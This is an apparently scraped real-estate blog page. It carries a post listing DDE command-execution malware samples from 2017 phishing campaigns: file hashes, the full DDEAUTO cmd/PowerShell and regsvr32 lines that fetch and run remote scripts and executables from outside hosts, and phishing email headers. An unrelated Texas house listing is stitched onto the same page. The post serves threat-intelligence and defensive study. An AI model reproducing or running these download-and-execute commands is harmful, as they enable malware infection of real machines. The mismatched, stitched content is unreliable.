Twitter Updates

    follow me on Twitter

    List for 4.5% and get 1% cash back on your purchase


    How much is your home worth?
    Receive Home Listings By Email

    Friday, January 26, 2024

    DDE Command Execution Malware Samples




    Here are a few samples related to the recent DDE Command execution






    Links updated: Jan 20, 2023


    References
    File information
    List of available files:
    Word documents:
    bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
    a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
    b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
    9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
    7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
    313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
    9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
    8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
    11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
    bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

     Payload 
    8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
    2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
    316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
    5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
    fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 


     File details with MD5 hashes:
    Word documents:
    1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
    bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

    2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
     2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

    3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
    8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. 

    4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
    78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

    5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
     aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

    6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
    507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")


    7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
    47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

    8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
    47111e9854db533c328ddbe6e962602a


    9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
    d78ae3b9650328524c3150bef2224460


    10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
    5786dbcbe1959b2978e979bf1c5cb450


    Payload Powershell

    1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

    2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

    Payload PE

    1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
    3a4d0c6957d8727c0612c37f27480f1e

    2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
     4f3a6e16950b92bf9bd4efe8bbff9a1e

    3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
    09d71f068d2bbca9fac090bde74e762b



    Message information


    For the EDGAR campaign
    bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

     Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236])
    by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
    (version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
    for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
    Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
    (envelope-from <EDGAR@sec.gov>)
    id 1e28HE-0001S5-Ew
    for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
    To: <snip>
    Subject: EDGAR Filings
    X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75
    X-PHP-Originating-Script: 658:class.phpmailer.php
    Date: Wed, 11 Oct 2017 04:05:48 +0000
    From: EDGAR <EDGAR@sec.gov>
    Reply-To: EDGAR <EDGAR@sec.gov>
    Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
    X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
    boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"
    Content-Transfer-Encoding: 8bit
    X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
    X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
    X-AntiAbuse: Original Domain - nu.com
    X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
    X-AntiAbuse: Sender Address Domain - sec.gov
    X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
    X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
    X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
    X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
    X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
    X-CLX-Shades: Junk
    X-CLX-Response: <snip>
    X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
     signatures=0
    X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
     suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
     lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
     adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000
     definitions=main-1710110060

    This is a multi-part message in MIME format.

    --b1_7608a3de5fe6c9bf7df6782a8aa9790f
    Content-Type: multipart/alternative;
    boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"

    --b2_7608a3de5fe6c9bf7df6782a8aa9790f
    Content-Type: text/plain; charset=us-ascii

    Important information about last changes in EDGAR Filings


    --b2_7608a3de5fe6c9bf7df6782a8aa9790f
    Content-Type: text/html; charset=us-ascii

    <b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>



    --b2_7608a3de5fe6c9bf7df6782a8aa9790f--

    --b1_7608a3de5fe6c9bf7df6782a8aa9790f
    Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx

    <snip>


    --b1_7608a3de5fe6c9bf7df6782a8aa9790f--


    for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

    Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by
     AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP
     Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
     15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
    Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by
     VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP
     Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
     15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000
    Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
     (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
     (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
     cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct
     2017 10:45:14 +0000
    Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
     VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
     SMTP Server (version=TLS1_2,
     cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend
     Transport; Thu, 12 Oct 2017 10:45:14 +0000
    Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by
     DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP
     Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id
     15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
    Received: from <snip> (10.234.178.186) by
     <snip>(10.144.20.58) with Microsoft SMTP
     Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
    Received: from <snip> (10.234.174.102) by
     <snip> with Microsoft SMTP Server
     id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
    Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by
     Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
     11:43:38 +0100 (CET)
    Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by
     rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
     12 Oct 2017 11:43:36 +0100
    Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by
     rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
     11:43:36 +0100
    Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
     [188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
     <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
     v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
     (BST)
    Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])
    (using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
     certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
     571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
    From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
    To: <snip>
    Subject: Document
    Thread-Topic: Document
    Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
    Date: Thu, 12 Oct 2017 10:43:35 +0000
    Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
    Content-Language: en-US
    X-MS-Exchange-Organization-AuthSource: <snip>
    X-MS-Has-Attach: yes
    X-MS-TNEF-Correlator:
    received-spf: Fail (protection.outlook.com: domain of <snip> does
     not designate 147.152.120.47 as permitted sender)
     receiver=protection.outlook.com; client-ip=147.152.120.47;
     helo=<snip>;
    x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124
    x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
    x-ms-publictraffictype: Email
    X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
    Content-Type: multipart/mixed;
    boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"
    MIME-Version: 1.0

    Continue reading
    Posted by at

    No comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)

    Home for sale- $2,000 rebate!

    Ready Real Estate slide show

    View sdutton's profile on slideshare

    Become a fan of my page

    Sheree Dutton, Reatlor, DFW, Texas on Facebook
    Powered By Blogger

    Pandora Faves

    Back on the market, price reduced, 1% cash back rebate offered

    Sheree Dutton | Ready Real Estate | 817-975-0461
    222 Birchwood, Azle, TX
    Back on the market, price reduced and 15 cash back rebate offered!
    3BR/2BA Single Family House
    offered at $102,500
    Year Built 2006
    Sq Footage 1,142
    Bedrooms 3
    Bathrooms 2 full, 0 partial
    Floors 1
    Parking 3 Covered spaces
    Lot Size .225 acres
    HOA/Maint $0 per month

    DESCRIPTION

    Wow, talk about pride of ownership! This house has too many upgrades to count, and is so well cared for. You must see it to believe it! A lot of value in this perfect starter home.

    OPEN HOUSE SUNDAY MAY 3RD 2+5 pm

    see additional photos below
    PROPERTY FEATURES
    - Central A/C - Central heat - Fireplace
    - High/Vaulted ceiling - Walk-in closet - Tile floor
    - Living room - Breakfast nook - Dishwasher
    - Refrigerator - Stove/Oven - Microwave
    - Laundry area - inside - Balcony, Deck, or Patio - Yard

    OTHER SPECIAL FEATURES
    - 1 car garage, covered carport for 2 cars
    - covered wood deck in backyard
    - gutters
    - storage shed
    - newly stained wood fence
    - electric fireplace added, with tile hearth
    - upgraded ceiling fans and light fixtures
    - island in kitchen
    ADDITIONAL PHOTOS

    Fantastic curb appeal

    covered wood deck in back

    living room

    kitchen with island

    breakfast nook

    master bedroom
    Contact info:
    Sheree Dutton
    Ready Real Estate
    817-975-0461
    For sale by agent/broker

    powered by postlets Equal Opportunity Housing
    Posted: Sep 11, 2009, 7:31am PDT

    Blog Archive